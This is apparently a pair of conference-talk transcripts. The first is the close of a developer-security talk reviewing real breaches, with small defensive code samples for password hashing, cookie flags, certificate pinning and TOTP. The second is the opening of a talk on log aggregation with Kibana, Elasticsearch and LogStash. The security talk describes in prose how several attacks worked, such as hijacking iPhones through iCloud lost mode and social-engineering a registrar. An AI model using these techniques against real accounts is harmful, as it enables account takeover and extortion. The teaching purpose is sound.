Not in so far as it's not something you give to customers and they use and we're gonna get an immediate sort of value in return on that. It's like an insurance policy. And a lot of companies don't like to spend on it. Even though in many cases, it's simple. Protecting from SQL injection is easy. You've just gotta know where to look. Companies aren't looking at that. And I think part of the problem is that they don't see the potential downside. They see there's gonna be an immediate cost, which is to train developers or get a penetration test. But then it's gonna be sort of offset by this potential that we may lose a heap of money later on, and that's hypothetical and, oh, look, something new, and they move on. So being conscious that there are real, tangible costs when it goes wrong. So number six, Gawker. Gawker was an interesting one a few years ago and it was another sort of case of, in this case, Nick Denton who headed up Gawker, having a bit of argy-bargy, I think it was with 4chan at the time, the sort of precursor to Anonymous. And it was one of these sort of online ego wars, which generally don't tend to end well for the guys that are public and for the most part doing the wrong thing, because the attackers don't generally tend to play by the rules. But anyway, Gawker got hacked. They had a very poor cryptographic implementation on their credentials, which made it very easy for the attackers to convert that data back to plain text. So there's nothing too unique about that, but where it got interesting was what started happening on Twitter. So why would you get Twitter spam from people who had just been hacked by Gawker? Any guesses? Reused passwords? Yes? Okay, so people reuse passwords. We touched on that a little bit earlier on with HBGary, but this was interesting because it was a very sort of broad attack that targeted a lot of people.
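That "very poor cryptographic implementation" is worth a quick illustration. The gap between what gets credentials cracked in minutes and something defensible is only a few lines; a sketch using Python's hashlib (the iteration count is just an illustrative figure, not a recommendation from the talk):

```python
import hashlib, os

password = b"correct horse battery staple"

# Weak: one fast, unsalted MD5 round. Crackable with rainbow tables
# and GPUs at billions of guesses per second.
weak = hashlib.md5(password).hexdigest()

# Better: a salted, deliberately slow key-derivation function.
# The random per-user salt kills precomputed tables, and the high
# iteration count makes every single guess expensive for the attacker.
salt = os.urandom(16)
strong = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000)

print(weak)
print(strong.hex())
```

Both tick the "we hash our passwords" compliance box; only one of them actually slows an attacker down.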
So clearly the attackers have got their hands on this great big dump of compromised passwords, and then they've gone on a spam campaign. Makes you wonder how complicit the acai berry people were in that. I don't think they'd be real happy knowing that their brand was being promoted in this way. But the interesting thing about this is it shows how we do kind of become responsible for the security of other accounts. Whether we like it or not, we're sort of implicitly responsible. So several things came out of that, and one of them is clearly that not all cryptographic storage is equal. And when I was talking about cryptography, they talk about insecure cryptographic storage. It's not like, do you have it or do you not have it? It's have you done a good job of it. So I know there are a lot of times where people go, oh yeah, we use cryptography or encryption or hashing or however they want to phrase it, and they can say yes, we've done it, and they've ticked the box and the auditors are happy and the compliance team is happy, but it's crap. They've done a really bad job. It's not all equal. As developers, we often think when we do do a good job of it, or when we do put a focus on cryptography and the way we store and handle passwords, we think that we're protecting our system. And we are, but what we've got to understand is that we do have some responsibility for protecting other people's systems as well. The other systems where these users reuse their passwords, and as much as we all like to jump up and down and say yeah, well nobody should reuse their passwords, a lot of people do. We've all done it at one time or another as well. I know none of us do it now, but we've certainly all done it, and it is something that happens. So we do have this sort of projected responsibility onto these other websites. So the other thing that's a bit interesting here as well is that from Twitter's perspective, this was just people logging into Twitter. Okay, so it looked legitimate.
It wasn't brute forcing. It wasn't let me take this username and 5,000 passwords and see if any of them work. It was username, password, bang, straight in, because they already had the credentials. But people were abusing Twitter. So I guess the sort of question to think about there is how do you protect your system against attackers using legitimate credentials? In Twitter's case, does it really make sense to have the same spammy looking message go out 5,000 times? You know, maybe that should have set a flag off there. And finally, two factor. So two factor keeps coming up again and again and again. And two factor is the thing that saves you when the thing that we know is disclosed, but the thing that we have is not. So that is a very common theme. So the next one here is quite interesting because it sort of forces you to challenge what you think you know about HTTPS and SSL. So this was the Tunisian government and Facebook. And this was a few years ago. And the story here was that at the time, Facebook would load the login page over HTTP. So you'd be looking at http://facebook.com, bang, here's a login form. Now a lot of the time people look at that and they go, oh, you're clearly not secure, right? It's not SSL. But the form posted to HTTPS. So the counter argument is, well, the credentials were protected when they were sent to the server, and they're right. The credentials were encrypted when they got sent to the server. If you had have intercepted those packets, you couldn't have done anything with them. So that's good. The problem, of course, is that SSL is about much more than just encryption. So there's only three things I talk about with SSL. And one of them is authenticity. So when you go to a website and you see a padlock in the address bar and you can inspect the certificate and you can see it says Facebook.com, you have a pretty high degree of confidence that it is Facebook.
And just by the by, if you put a bitmap of a padlock icon somewhere in the web page, that doesn't make it secure. That's a fricking bitmap. It's not the same as the one that's in the address bar. People do that, believe me. So that was number one, authenticity. Number two is integrity. So when you load something over an HTTPS connection and SSL does its thing, you can have confidence that the content of the page hasn't been manipulated. And that's where it went wrong with Tunisia, because it wasn't loaded over HTTPS. You could have no confidence that the page hadn't been manipulated. We're gonna do this Friday as well. We're gonna find a nice site that does that and steal credentials in an ethical way, mostly. And finally, it is also about confidentiality. So the third point was, you do get your data protected when it goes over HTTPS. People can't actually read what is in there. Now the interesting thing is, is that here's what happens. So this is the way the attackers, and in this case, the attacker is the nation state. This was before we were worried about the Americans, who we know like doing a lot of this sort of stuff, like most other big governments, no doubt. Anyway, what they were doing was they were putting this JavaScript in the page. It doesn't matter too much, the detail of this, but what was quite tricky about it is that they were firing an asynchronous request on submit that included the credentials. And that asynchronous request was actually going off to facebook.com, but it was appending the credentials in an encoded query string, and it was also sending them to an HTTP address on facebook.com. And because it was going to an HTTP address, the attackers, the government, could view the contents of it. But if anyone else looked at it, they'd go, what the hell is Facebook doing? Oh, it looks encrypted, of course it's not, it's encoded. Looks okay, but it is going to Facebook. So it was a nice sort of tricky little way of getting around that.
Now, there's a few different things that we can take out of this. And one of them is that a little bit like cryptography, SSL is not a have you done it or have you not done it, it is have you done it right. So you cannot load anything over an HTTP connection and not expect it to be manipulated or observed. So you cannot load login pages over HTTP without expecting them to have been changed. You cannot let people view an authenticated page and send an auth cookie over an HTTP connection without expecting it to be sniffed and the session hijacked. So there are nuances to the way that SSL is done that make it very, very easy to do it insufficiently. And this is what I was talking about, they say insufficient transport layer protection. So there's like this degree. And there are certainly degrees of making it even more secure again. So did anyone see Firesheep a few years ago? Man, that was fun. So what Firesheep did is it was a little plug-in for Firefox. And the idea was that you could go into an internet cafe with your laptop. In fact, you could go into here. This place is great because there's no encryption on the wireless. So apparently what you could do here is you could use Firesheep. And what it would do is it would look at the network traffic around you, because when you're not on an encrypted network, it is possible to observe other packets on the same network. And it would look for packets. It would look for requests being made to Facebook where the authentication token was being sent over an HTTP connection. And because it was a very nice plug-in and very user-friendly, you'd load the web browser and you'd get a list of all the people in the cafe. You'd get the photos. So you could look around you and go, oh, there's that guy. Here he is on Facebook. And you could click on him and steal his session because the cookie wasn't protected. So Firesheep was a bit of a watershed moment where people started going, OK, we know we could do this.
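The defence against that kind of session sniffing, on top of serving everything over HTTPS, lives in the cookie attributes themselves. A sketch using Python's stdlib `http.cookies`, just to show what the flags look like on the wire:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["auth"] = "session-token-value"
cookie["auth"]["secure"] = True    # browser only ever sends it over HTTPS,
                                   # so a Firesheep-style sniffer never sees it
cookie["auth"]["httponly"] = True  # script can't read it, so XSS can't steal it

# Both flags appear in the Set-Cookie header value
print(cookie["auth"].OutputString())
```

An auth token without those two flags is one open wifi network or one XSS hole away from being someone else's.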
But when you see it packaged together so nicely and made so easy, yeah, maybe we'd better actually pay a little bit of attention and fix it, which is what Facebook has done. Because now everything on Facebook is SSL. Certainly anything that needs to be secure is sent over HTTPS. And I guess that's a good question for you to go away with as well. In your own assets, what are the things you're doing over HTTP that may put you at risk? And again, the classics: loading a login form over HTTP, sending cookies that are not flagged as secure when they're auth tokens. So if that's a foreign concept, that's one of the things I talk a lot about in the Pluralsight courses, looking at things like the HTTP only and secure attributes of cookies. Because if you don't have those two things, you've got a whole world of potential trouble. DigiNotar, rest in peace. DigiNotar was a Dutch certificate authority, and a few years ago it got owned rather seriously by some attackers that managed to start issuing rogue certificates. So the whole premise of this sort of public key infrastructure of certificate authorities is that there are a handful of trusted ones. And they have the ability to issue certificates under certain organizations' names. So any of us can go along to somewhere like VeriSign. If you want a free one, go to StartSSL. You can get a free certificate, and they will verify your identity, and that you own the domain, and then they'll give you a certificate. What that means is that you can stand up a website, you can make it HTTPS, you can serve that certificate up, and that will give people confidence that you are who you say you are, and everything gets encrypted so it can't be observed or manipulated. Now when an attacker compromises a certificate authority, they can start creating certificates for whoever they like. And these guys decided that they liked Google. So they created certificates for Google.
They created certificates for some of the other big ones that Google has. But Google was the really prominent one, because once you can create a certificate for Google, if you can get in the middle of the traffic, then the client still sees an HTTPS connection, still sees a valid certificate by a valid CA, but the person who's doing the man-in-the-middle attack can intercept all the traffic. And of course that means they can change it or read it. So what was observed when all this washed up, and the guys did start looking at what was happening inside DigiNotar, is they noticed a whole heap of certificate validation checks coming from Iran. They're called OCSP checks, and they make sure that a certificate hasn't been revoked. Now DigiNotar was not the CA for Google. So of course the question is, why are we getting OCSP requests for Google from Iran? There should not be a DigiNotar certificate for Google. So chances are it was the government. And a little bit like the Tunisia situation, I guess we could expect that it might happen somewhere like Iran. Government gets control of the connection. Government gets a compromised certificate from DigiNotar somehow, signs their own traffic, and for all intents and purposes, makes it look like a legitimate connection. You get the padlock, the real padlock, not the bitmap, and the government gets all of the traffic. So good for the government. Not so good for DigiNotar, because when you are a security company and you base your entire operation around being a secure certificate authority, and then you're not, you go bankrupt. So it didn't end real well for DigiNotar. Really bad for the Dutch government too, because the Dutch government was very, very dependent on their local CA, which you can kind of understand, but in retrospect, maybe not such a good idea. Comodo also had similar sorts of issues. Looks like the same attacker, but Comodo didn't ultimately go under. They weren't owned quite as badly. So a few things here.
We do depend on certificate authorities as sort of the fabric of SSL. So we put our trust in the fact that when we see certificates, things are valid and we can trust the connection for the three reasons I mentioned. But certificate authorities can get owned. It does happen, and it's a big event when it happens. I mean, DigiNotar was serious, serious stuff, but it does happen. We have also seen other attacks against SSL. BEAST and CRIME, most recently Heartbleed. Heartbleed wasn't really an attack against SSL per se, but it was a vulnerability in OpenSSL. So if you were trying to implement SSL on your application and you used OpenSSL, which is on about two-thirds of machines on the internet, then you potentially had problems. So some of the things that we can do as well to protect against vulnerable implementations of SSL are things like cert pinning. So for example, if you use Google Chrome and you go to Gmail and the Iranian government, let's imagine you're in Iran, the Iranian government has owned your connection and they've got rogue certificates. If they don't serve up the right certificate with the right thumbprint that Google Chrome expects, so Google Chrome has that certificate pinned, then it throws its hands up and says, no, there's something wrong, we're not gonna give you any data or anything like that. You often see this in mobile apps with banks as well. There's a very easy way to check. You can proxy your traffic through Fiddler, you can install a self-signed certificate on your device, and you can look at that traffic, and a lot of banking apps will say, no, this isn't any good, even though the certificate chain is valid, because it is not the right thumbprint, you're out of here. We'll have a look at that on Friday as well, we're gonna proxy some traffic and see how that works. What is a little bit difficult there though is you can't really do it on your own website. So it works for Google with Chrome because they own the client and they own the server.
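Under the hood, a pin check like that is nothing more than a fingerprint comparison. A sketch of the idea in Python (the certificate bytes here are placeholders, not a real DER blob):

```python
import hashlib

# The client ships with the SHA-256 fingerprint of the certificate
# (or its public key) that it expects -- the "pin".
PINNED_FINGERPRINT = hashlib.sha256(b"server-cert-der-bytes").hexdigest()

def connection_allowed(presented_cert_der: bytes) -> bool:
    # Even a certificate that chains to a trusted CA gets rejected
    # if its fingerprint doesn't match the pin -- which is exactly
    # what stops a rogue DigiNotar-issued certificate.
    return hashlib.sha256(presented_cert_der).hexdigest() == PINNED_FINGERPRINT

print(connection_allowed(b"server-cert-der-bytes"))   # → True
print(connection_allowed(b"rogue-cert-from-bad-ca"))  # → False
```

The hard part isn't the check, it's shipping and rotating the pin, which is why it only really works when you control the client.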
Most of the time when we build web apps, we don't own the client. We're depending on people using whatever browser it is they use and we can't actually pin certificates there. PFS or Perfect Forward Secrecy is another good example of how it can be strengthened, where instead of having one private key that signs everybody's traffic, effectively every connection gets its own private key, and if you have a Heartbleed and keys are leaked, it doesn't put everybody at risk. And there's a really, really pragmatic, easy piece of advice here as well, which is don't have stuff you don't need to. The number of times people have got classes of data that they have to store in the database and protect in transit that they never need is nuts. I have this discussion often, things like do you really need people's religion? What are you gonna do with people's religion? This is sensitive personal information. Not the sort of stuff you wanna leak. If you don't have it, you can't lose it. And finally, clearly in a case like DigiNotar, it can be game over. An attack like this can be the end of the organization. Not just 170 million bucks like Sony got hit with. And I guess 170 for Sony maybe isn't, I mean it's notable, but it's not a whole lot. It can actually bring you down entirely. So it didn't end well for DigiNotar. So a more recent one, the Twitter @N account. This was one that happened a little bit earlier this year. Now apparently single digit or single character Twitter accounts are very valuable. This guy said his account was worth 50 grand. People had offered him $50,000 for his account. I guess you can kind of imagine it. You've only got about 140 characters. If you have a one-character account, maybe it's like number plates and the really short ones are valuable. So anyway, this account was very valuable and an attacker wanted to take his account. So he did it by hacking the guy's GoDaddy account.
Now the reason why that works is first of all, the guy managed to call up PayPal, social engineer PayPal and get the last four digits of the credit card. Now he never disclosed how he social engineered PayPal to get that, but I think we've seen enough examples to understand that that's well and truly within the realms of possibility. So he's got the last four digits of this guy's credit card. So then he calls up GoDaddy and says, look, I've been locked out of my account and my email address and stuff has changed and I need to verify my identity. And GoDaddy says, okay, well give us the last six digits of your credit card account. And the guy goes, well, I've got four. And GoDaddy says, well, do you want to guess? Just guess the other two. Is it one? No. Is it two? No. Is it three? Yeah, three. Okay, what about the other one? And they just let him guess. So GoDaddy was just like, keep giving out free chances. So good on GoDaddy. Now what ended up happening was the guy got access to the GoDaddy account. He went into this victim's GoDaddy account, changed all the contact details. So no longer does the GoDaddy account look like it belongs to the victim. Email addresses, names, physical addresses, contact details. And then he contacted the legitimate owner of the @N account and said, give me your @N account or I kill all your domains and I delete your websites and I do all the other stuff I can do when I have control of your DNS. And this guy was trying to get in touch with GoDaddy and said, look, it's me. Can you give me the account back? And they go, well, it's not you. Our records say that guy over there owns it, he's just stolen your account. Because we let him guess your bloody credit card number. So this was a really sort of interesting social engineering attack against GoDaddy. What's interesting when we look at GoDaddy, this is today, it was two weeks ago, I assume it's still the same today. So what's wrong with this? Where's the HTTPS? No HTTPS?
It posts to HTTPS, but we know from Tunisia that that's not sufficient. Now on the plus side, with GoDaddy, you can get two-factor authentication. Actually, you probably can't and I probably can't, because you've got to be American to get it. So they've got two-factor authentication, but unless you're in that small percentage of the worldwide internet population that's in the US, you can't use it. So GoDaddy, not so good on a couple of fronts there. So the things that we get out of this is that again, we're getting into this sort of thing where you're pwning one account and then you jump to the other one and you've got that and you've got that. And in this case, it was actually a ransom. You know, it's not even like he managed to pivot. But we do see compromising one account leading to this cascading effect of other accounts being compromised. Untrustworthy humans again. Guessing credit card numbers? That's nuts. Come on. Who lets you keep guessing? That's crazy. Actually, I'll tell you who lets you keep guessing. Qantas lets you keep guessing, and I'll show you on Friday. That's another topic. Two-factor authentication, we just keep going through this again and again and again. It's nice that GoDaddy has it. It's bad that nobody outside the US gets it. Admittedly, that's where their predominant audience is. But give it to other people. I mean, geez, everyone else can figure it out. You can get it on Twitter and Facebook and everything else. Why can't you get it on GoDaddy? Now, Twitter also really wasn't very helpful. Twitter should have sort of done the math after he'd given the account away and said, well, actually, yeah, we can see this is your account and here's the paper trail of everything that happened. Here you go. Have it back. And they, by all accounts, were pretty useless. Eventually, they came to the party and they did give him his account back after he'd surrendered it to the attacker. But it took him a long time.
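Since two-factor keeps coming up: the six-digit codes most of these services generate are TOTP (RFC 6238), and the whole algorithm fits in a dozen lines. A sketch using the RFC's published test secret:

```python
import hashlib, hmac, struct, time

def totp(secret, for_time=None, step=30, digits=6):
    # The moving factor is the current 30-second interval number.
    counter = int((time.time() if for_time is None else for_time) // step)
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    # Dynamic truncation per RFC 4226: take 4 bytes at an offset
    # derived from the last nibble of the digest.
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test secret; at t=59s the interval counter is 1, which
# matches the RFC 4226 test vector "287082".
print(totp(b"12345678901234567890", for_time=59))  # → 287082
```

The point is that the code proves possession of the shared secret at this moment in time, so a password dumped from some other breach is no longer enough on its own.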
And I guess the lesson there is it is a free service. Even if it's a valuable single character account, it's a free service. How much support do you actually expect from Twitter? The last one I thought we'd look at is very topical. So this was just last week. And this is what a lot of people in Australia woke up to last week. And they were woken up to this at about 2 AM in the morning for many people. And allegedly, as you can see here, Oleg Pliss has locked their phone. And he's done all of this remotely and he's now demanding money. He's demanding a ransom. A lot of sort of everyday mums and dads in Australia got hit by this, certainly hundreds. I don't know quite how they're going to figure out how to use MoneyPak or Ukash or paysafecard when their phone is locked. And it may be the only thing they have. But somehow, Oleg, or whoever it is who was impersonating Oleg, was expecting them to know that. So let me explain how he actually did this. So I've got a post on my blog from last week breaking this down, showing you how an attack like this works. So the first thing is the attacker logs into their iCloud. Now, how the hell does an attacker log into an iCloud? That is a question that is not yet answered. For some reason, a bunch of Australians and some people from overseas as well, but very predominantly Australians. And Australia has less than 1% of the global internet audience. So I don't know why we featured so much. But somehow, the attacker has got enough information to log into the victims' accounts. So for example, it may be that we had an Aussie service compromised last week. And it may be that the attacker got a whole bunch of localized usernames and passwords and then just started going through them, holding them all for ransom. Now, he may have automated the whole thing much more than this. But this is how you would manually go and hijack someone's account. So on the right-hand side, we have the attacker.
So he's pulled out his iPhone or his iDevice or whatever it is he's got. And he's logged onto the victim's iCloud account. That allows you to see where their device is. So here, I've got my attacker hat on, and I'm looking at Troy's iPhone. And I want to hijack that device. So what I do is I start a lost mode process. So if you've got iCloud and iOS devices and you've used Find My Phone, you may have seen this before. The theory is that if you legitimately lose your phone, you can see where it is on the map. And then you can turn on lost mode. Now, when you turn on lost mode, you can set a pin on the phone. Now, you can only do this if the phone doesn't already have a pin. So all of these people that got owned by this attack last week didn't have a pin on their phone, which means the attacker can enter their own pin into the lost phone mode. Now, when they do that, they can also put in a phone number. And the theory is that if you legitimately lose your phone and someone picks it up, they see a message, which is normally a lot friendlier than the one you see here on the left side of the screen. And they see a phone number that they can click on and use your phone to call your wife or your husband or whoever it may be at home on their other phone. That's the way it's meant to work. This guy was using it as a code, which he inevitably wanted to accompany the payment so that he could verify who had actually paid him. And then in theory, unlock the phone. I don't like the chances of you ever getting your phone unlocked by the way, if you send money to someone called Oleg Pliss, who has just held your phone to ransom. So anyway, he'd put a number on. And then he would put a message like this. Now, after adding the message, he could also hit the great big play sound button, which means that whether the phone is on mute or whether the volume's turned all the way down, doesn't matter. The phone would go absolutely nuts. 
And all these people being woken up at 2 AM in the morning with their phone irretrievably locked. You cannot unlock it short of a vulnerability in iOS, of which there have been a whole heap at different times. But it's probably not the sort of thing that mum and dad are going to be able to sort of circumvent and get their phone back online. So incidentally, the only thing that people could do is restore from backup. So they could restore, say, from a local backup in iTunes. They could just blitz the device and restore from iCloud, if the guy doesn't actually destroy their entire iCloud account. You can't remotely unlock. So even if you've still got access to your iCloud account, you can't unlock this phone by sort of reversing the process and turning off lost mode. Once the pin is set, the pin stays there. So actually, I mean, the guy's kind of ingenious. It's a reasonably good attack in terms of the ease and the effectiveness. Now clearly, there were a few things that came out of this. So one of them being security basics. This wasn't hard stuff. So there are multiple things that consumers had to have not done in order to fall victim to this attack. If they had done any one of these next three things I'm going to read off, it wouldn't have been a problem. So one of them was they almost certainly reused passwords. Apple released a statement about this. And as Apple is prone to do, it was very curt and very direct and said, don't reuse passwords. Please go away. It was something to that effect. It was basically saying, look, we don't know. It's your fault. I suspect they actually know a lot more than that. I mean, they see this happen inevitably on the back end. But they've put it down to password reuse. So number one, password reuse. Number two, they didn't have pins on their devices. Even just a four-digit pin, and it would have been OK. So I don't know. Maybe it was a little-used iPad, and it's the kid's iPad. 
But I've got little kids, and I tell you, well, they can figure out a four-digit pin pretty easy. So that shouldn't be a barrier. And the third thing was no two-factor authentication. If there was two-factor, this must be the fourth time we've said this now. If there was two-factor, assuming this is the way the guy got in and there wasn't some unknown vulnerability in iCloud, this could not have happened. Now, iCloud is enormously convenient, and hackers love it. They loved it with Mat Honan because they could wipe his devices. They love it with these sorts of people as well. This is why someone probably sitting in the Eastern Bloc somewhere in Europe is able to wake up Aussies at 2 AM and lock their phones. It is enormously convenient. Of course, the reality of it is, if the attacker has access to iCloud, they could have also taken the backups that go to iCloud, because backing up to iCloud is so convenient. It's also convenient for the attacker. He could have taken those backups, restored them to his device, accessed things like the keychains that get synced across your Apple devices, because that's also very convenient. And basically, just taken over people's lives, or as Mat Honan said, basically destroyed their digital world. So an enormous amount of potential for hackers. Now, the ransom one is a bit interesting too. Clearly, that did possibly give the attacker opportunities to do other things, but ransoms are this sort of other class of software we're seeing, often called ransomware. Things like CryptoLocker in the news a lot at the moment, where attackers will get malware onto PCs, generally do a pretty good job of encrypting all their data, and then say, look, if you want to decrypt it, you've got to send me $200. So ransoms are becoming a thing. But from Apple's side as well, you do have to wonder, just how many devices should someone be able to lock with a message from Oleg Pliss demanding a ransom before Apple go, maybe this shouldn't happen? 
Now, I know that they're massive, and they have all sorts of resets and things going on, but this is a sort of fraud pattern that they probably should be detecting. And the question for you guys is, in your apps, where there are critical functions, things like being able to take over people's devices, maybe just knowing your username and password isn't really enough to let people do that. So wrapping up, there are a few things here that were really common patterns across the whole thing. And one of them is that all of these risks are really well known. They're really well documented. Heaps of free material out there, heaps of stuff like my Pluralsight courses, I've got a free ebook on troyhunt.com, numerous blog posts, all of this stuff is known by many security professionals, known by many developers as well. So a lot of this is not new, yet we keep building vulnerable apps. And clearly, interlinked accounts is another biggie. So we keep having problems where we create these interdependencies between accounts. And I think almost as a consumer, the thing we've got to think about is, do we really want to allow this account to be reset by that one? Or should you be able to authenticate over there and do something over here? Convenient, yes. Secure, yeah, it can have issues. We've seen some very bad humans throughout this process. Humans are notoriously bad at security. And I mentioned social engineering is one of the biggest risks that we have. Computers are very good at doing what they're told to do. Sometimes they're not told to do the right thing, which is another issue altogether. But certainly they are more predictable in this way than humans. So don't forget the social engineering aspect. And finally, it does come back to us as the devs. So what sort of training are we getting to understand these risks? For those of us managing teams or delivering on behalf of organizations, what sort of processes do we have around penetration testing? Even automated scans. 
So there are tools out there. You can just point one at a website, and it'll come back and say here's 50 things that are wrong with it. So there are very easy ways to do it, but we as developers have got to take some responsibility for it. So with that, thank you very much. I did refer a number of times to Friday where I am going to do demos and show things getting broken. And because I'm in Norway and a lot of people said I should do this in Norway, we're also going to look at pwning Swedish websites, which I believe is quite popular. Thank you very much. Any question time? Couple of minutes, any questions? Over here. [Inaudible audience question.] All right, so the question is about password managers. And the gentleman mentioned KeePass. KeePass is one, LastPass is another. I use 1Password. Do they have any vulnerabilities? Probably. Do I know of any? No. I think password managers are about the best mousetrap we have for managing passwords. Because if we want a password to be strong, it has to be long and random and all these sorts of things, and we want it to be unique, and we've only got so much memory to be able to do that. So we certainly can't do that across the breadth of accounts that people here probably have, because we create so many accounts online. So I personally feel that the best balance is to get a good password manager, LastPass, KeePass, 1Password, and use that as much as you possibly can. Any other questions? Nope. Okay, well, do remember, oh, up there, sorry, you're behind the light. Ah, good question. So what is the hashing algorithm in the SQL membership provider? So it depends on the version of ASP.NET. 
So the one that we're going to break on Friday is the ASP.NET implementation that you would get with a Visual Studio 2010 project, which gave you one round of SHA-1 with a salt, which is totally useless, and we will hack that at a rate of 10 million passwords a second on Friday. And that's slow, because it's on this laptop. We can do 4 billion at home on a good machine. Newer versions have different implementations. I think the latest one is doing a thousand rounds of PBKDF2 with SHA-512. So even that, by many people, is viewed to be insecure. So the short answer is it's getting better, but go back a few years, and it was very bad by today's standards. Anybody else? Okay, look, if everyone could fill out the evals on the way out as well. That's the green card on the end. Thank you very much, everyone.
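For reference, the key stretching mentioned in that answer, many iterations of PBKDF2 rather than a single round of SHA-1, looks something like this in .NET. This is a minimal sketch; the iteration count, output length and sample password are purely illustrative.

```csharp
using System;
using System.Security.Cryptography;

class PasswordHashingSketch
{
    static void Main()
    {
        // A random per-user salt defeats precomputed (rainbow table) attacks
        var salt = new byte[16];
        using (var rng = RandomNumberGenerator.Create())
        {
            rng.GetBytes(salt);
        }

        // PBKDF2 (HMAC-SHA1 in this .NET class); every extra iteration
        // multiplies the attacker's per-guess cracking cost
        using (var kdf = new Rfc2898DeriveBytes("correct horse battery staple", salt, 1000))
        {
            byte[] hash = kdf.GetBytes(32);
            Console.WriteLine(Convert.ToBase64String(hash));
        }
    }
}
```

The salt and the hash are what you would store; verifying a login means re-running the same derivation with the stored salt and comparing the results.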
Is it just me, or are we seeing more online attacks leaking more data year by year? Actually it’s not just me because the statistics are there to prove it. In fact the largest online breach we’ve seen to date was less than six months ago when Adobe became the victim of a 152 million record attack. A couple of months later and Target saw 110 million credit cards stolen making it the largest theft of financial data ever. In fact all told, we’re looking at in the order of 822 million records gone missing in 2013 alone. The thing is though, when we look back at recent attacks with the clarity of hindsight, they’re almost always easily preventable. Somewhere, somehow, someone had a major oversight in their code – or often many major oversights – that somehow slipped through the cracks, made its way into a production system and was consequently pounced on by someone with malicious intent. In this session we’re going to look through 10 examples of online attacks that should never have happened. Sometimes it’s a single easily preventable flaw in code, sometimes it’s social engineering of people with access to valuable data and other times it’s a chaining of individual risks knitted together in order to compromise the target. We’re going to systematically work through each of these 10 attacks, understand what went wrong and then assess how each system could have been built to be resilient to the attack. The lessons learned in this session are intended to help you better secure your systems by learning from the mistakes of those who have gone before you.
10.5446/50648 (DOI)
Good afternoon. Hopefully you had a good lunch. I guess our main task now is to keep you awake for the next hour. We'll try our best. My name is Vidar Kongsli, and with me is my colleague, Torstein Nikolaessen, and we're here to talk about monitoring your application using LogStash and Elasticsearch. We want to keep this an interactive session, so please ask questions along the way and shout if I don't see you. So, you might have noticed that we added the subheader logging for IT hipsters, and that's purely because we are so desperately wanting to be hip. I mean, this is the best we got. So you have to decide if we're hip or not. Now, seriously, we're here to talk about log aggregation, and our company is publishing what we call a technology radar, where we give our customers some advice on what technologies and techniques to use, to stop using, and to consider using. Log aggregation is something that we believe in, and something that we think you should try out, or at least consider. That's great. PowerPoint has stopped working. Nice start. Restarting. And it lost the document. Let's see if we can get this up and running. Okay, thank you, PowerPoint. We're back. So, we're here to talk about log aggregation, but first of all, let me just tell you a little bit about my own experience. You know, back in the day, when I wrote a program, I would now and then insert some log statements into my code just to see what's going on, maybe as an alternative to doing debugging in Visual Studio. And I didn't really have a broader picture of why I did logging. But when the code shipped, I kept the log statements in there, hoping that they would be useful. At least that was best practice. They should be kept in there. Now and then, when there was a problem in production, some operations guys asked us for advice, and we would tell them to go and look in the application log. But what did they find? Gibberish. Just pure white noise. Nothing that they could even comprehend. 
So, the problem was not that the data wasn't there, but it was not available. The context was different. Maybe the information was somewhere in there, but they couldn't find it. So, the main takeaway that we are hoping to give you today is that you should add some structure to your logs. And we are going to show you a few techniques on how to do that, a few tools, and a little bit of advice for the road. So, our presentation is split up into three main topics. First, I'm going to walk through a very common scenario using tools like Kibana, Elasticsearch and LogStash. Then, Torstein is going to give you the application or the developer's view on how to improve the logging in your application. And finally, we are going to give a few notes on the architecture of the log setup, how you can add reliability, how you can add scalability to your log setup. So, to do that, we are going to have a website as a case. This is our company's blog. It is an ASP.NET application. It runs on websites in Microsoft Azure. And the logs that we get out are the IIS access logs. So, we are going to go through a scenario where we have a look at those. The first tool that we are going to look at is Kibana. And by the way, it's not Katana, it's not Cortana, but it's Kibana. So, I know I'm going to get that wrong during the talk, so please let me know when I do. Kibana is a data visualization tool that can be used to visualize data in Elasticsearch. So, it's not just for logging. It's basically a pure JavaScript application. So, let's have a look at what that looks like. So, this is the main view that we get. And what you see here in the graph is what is called events, or basically requests to the web server, over time. So, on the x-axis we have time. On the y-axis we have the number of requests in a unit of time. So, what I can do here is I can go and change my time span. And we have the logs. 
I can go here and zoom into a specific time interval. And if I scroll down, I find more information about the data that I have in the log. So, each row here is a separate request to the web server. On the left here you see that I have a number of fields that I can filter on, or I can add fields to the table. If I click on a row, I get the entire data set for that particular event. We're going to look into the fields in a moment. So, what I can do here is I can also try to query this data. I can create a simple query just on the user's platform, for instance. So, if we try Windows, which we all know and love. And then I can add another piece of information for this raincoat thing, Macintosh. And you can see that the bars are added on top of each other. So, what's the third thingy? Linux. So, the idea is that we have a general tool where we can dive into the data and have different views on the data. So that was the Kibana part and the demo I just showed you. Good. And the next tool that we're going to look into is Elasticsearch. Elasticsearch is a general search utility. It's very scalable. It runs on something called a Java virtual machine, you know. You have heard of this. But don't worry, you don't have to learn Java. It has a REST API, so almost at all times, you interact with it through the web API. I was just kidding. I love Java. It's great. So, being a REST API, one of the things that you can do is talk to it from a browser. Here is a Chrome plug-in called Sense, which gives you some kind of a dashboard where you can query the Elasticsearch server. And you can get a few hints and suggestions on what you can do with it. You can do searches from here and stuff like that. Another way to interact with Elasticsearch is through plugins. There are a number of good plugins out there. And this particular one is called kopf. 
It gives us a good overview, kind of an operations overview, of what's in the server. So, on the top row here, you have some information. It says that there is one node in the cluster. Elasticsearch is a clustered server. In this case, there are 116 indices. There are over a thousand shards constituting over a million documents. And what you see in the table here, no, sorry, it's not the shards, it's the indices. And on the left there, you have something called kibana-int. I'm going to get back to that. But the main ones here are the ones named logstash- plus a date. So, we have here one index per date of our data. The green squares constitute the shards. So the indices are split into shards. And if you have more than one node in the cluster, the shards are distributed on the nodes in the cluster. There is also a REST interface here in this plug-in where you can play with making requests to the server and stuff like that, pretty much like you do in Sense. So, that's also very nice. The third tool that we are going to look at is LogStash. And its main purpose is basically shuffling the data back and forth. So, it picks up the data from a number of sources, then it does transformations, it can enrich the data, and then it outputs it somewhere else. So, that's the main purpose. And this is also a Java-based application. But again, you don't have to learn Java because the plug-ins are written in Ruby. So, don't be afraid. Or maybe you should be afraid. I don't know. So, the main concept in LogStash is the processing pipeline. And the pipeline is built up from three categories of plug-ins. You have the inputs which get data from somewhere. You have the filters which transform the data. And you have 